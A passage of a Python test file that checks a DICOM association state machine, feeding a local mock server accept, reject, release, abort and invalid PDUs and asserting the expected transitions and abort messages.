self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt18']
def test_evt19(self):
"""Test Sta5 + Evt19."""
# Sta5 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt19']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState06(TestStateBase):
"""Tests for State 06: Association established and ready for data."""
def test_evt01(self):
"""Test Sta6 + Evt1."""
# Sta6 + Evt1 -> <ignore> -> Sta6
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3)
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta6 + Evt2."""
# Sta6 + Evt2 -> <ignore> -> Sta6
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta6 + Evt3."""
# Sta6 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.01)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt3']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta6 + Evt4."""
# Sta6 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_rj),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt4']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta6 + Evt5."""
# Sta6 + Evt5 -> <ignore> -> Sta6
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta6 + Evt6."""
# Sta6 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_rq),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt6']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta6 + Evt7."""
# Sta6 + Evt7 -> <ignore> -> Sta6
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt7']
def test_evt08(self):
"""Test Sta6 + Evt8."""
# Sta6 + Evt8 -> <ignore> -> Sta6
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt8']
def test_evt09(self):
"""Test Sta6 + Evt9."""
# Sta6 + Evt9 -> DT-1 -> Sta6
# Evt9: Receive P-DATA primitive from <local user>
        # DT-1: Send P-DATA-TF PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt9', 'DT-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt9']
def test_evt10(self):
"""Test Sta6 + Evt10."""
# Sta6 + Evt10 -> DT-2 -> Sta6
# Evt10: Receive P-DATA-TF PDU from <remote>
# DT-2: Send P-DATA primitive
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', p_data_tf),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt10', 'DT-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt10']
def test_evt11(self):
"""Test Sta6 + Evt11."""
# Sta6 + Evt11 -> AR-1 -> Sta7
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt11']
def test_evt12(self):
"""Test Sta6 + Evt12."""
# Sta6 + Evt12 -> AR-2 -> Sta8
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AR-2: Issue A-RELEASE (rq) primitive
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt12']
def test_evt13(self):
"""Test Sta6 + Evt13."""
# Sta6 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rp),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt13']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta6 + Evt14."""
# Sta6 + Evt14 -> <ignore> -> Sta6
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt14']
def test_evt15(self):
"""Test Sta6 + Evt15."""
# Sta6 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.abort()
time.sleep(0.1)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt15']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta6 + Evt16."""
# Sta6 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT, and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_abort),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt16']
def test_evt17(self):
"""Test Sta6 + Evt17."""
# Sta6 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt17']
def test_evt18(self):
"""Test Sta6 + Evt18."""
# Sta6 + Evt18 -> <ignore> -> Sta6
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.4),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt18']
def test_evt19(self):
"""Test Sta6 + Evt19."""
# Sta6 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt19']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState07(TestStateBase):
"""Tests for State 07: Awaiting A-RELEASE-RP PDU."""
def test_evt01(self):
"""Test Sta7 + Evt1."""
# Sta7 + Evt1 -> <ignore> -> Sta7
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_associate('request'))
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta7 + Evt2."""
# Sta7 + Evt2 -> <ignore> -> Sta7
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta7 + Evt3."""
# Sta7 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt3']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta7 + Evt4."""
# Sta7 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_associate_rj),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt4']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta7 + Evt5."""
# Sta7 + Evt5 -> <ignore> -> Sta7
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta7 + Evt6."""
# Sta7 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_associate_rq),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt6']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta7 + Evt7."""
# Sta7 + Evt7 -> <ignore> -> Sta7
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt7']
def test_evt08(self):
"""Test Sta7 + Evt8."""
# Sta7 + Evt8 -> <ignore> -> Sta7
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt8']
def test_evt09(self):
"""Test Sta7 + Evt9."""
# Sta7 + Evt9 -> <ignore> -> Sta7
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt9']
def test_evt10(self):
"""Test Sta7 + Evt10."""
# Sta7 + Evt10 -> AR-6 -> Sta7
# Evt10: Receive P-DATA-TF PDU from <remote>
# AR-6: Send P-DATA primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', p_data_tf),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
#primitive = self.assoc.dul.receive_pdu(wait=False)
#assert isinstance(primitive, P_DATA)
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt10', 'AR-6'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt10']
def test_evt11(self):
"""Test Sta7 + Evt11."""
# Sta7 + Evt11 -> <ignore> -> Sta7
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt11']
def test_evt12(self):
"""Test Sta7 + Evt12."""
# Sta7 + Evt12 -> AR-8 -> Sta9 or Sta10
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AR-8: Issue A-RELEASE (rq) - release collision
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12']
def test_evt13(self):
"""Test Sta7 + Evt13."""
# Sta7 + Evt13 -> AR-3 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-3: Issue A-RELEASE (rp) primitive and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rp),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
primitive = self.assoc.dul.receive_pdu(wait=False)
assert isinstance(primitive, A_RELEASE)
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt13', 'AR-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt13']
def test_evt14(self):
"""Test Sta7 + Evt14."""
# Sta7 + Evt14 -> <ignore> -> Sta7
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
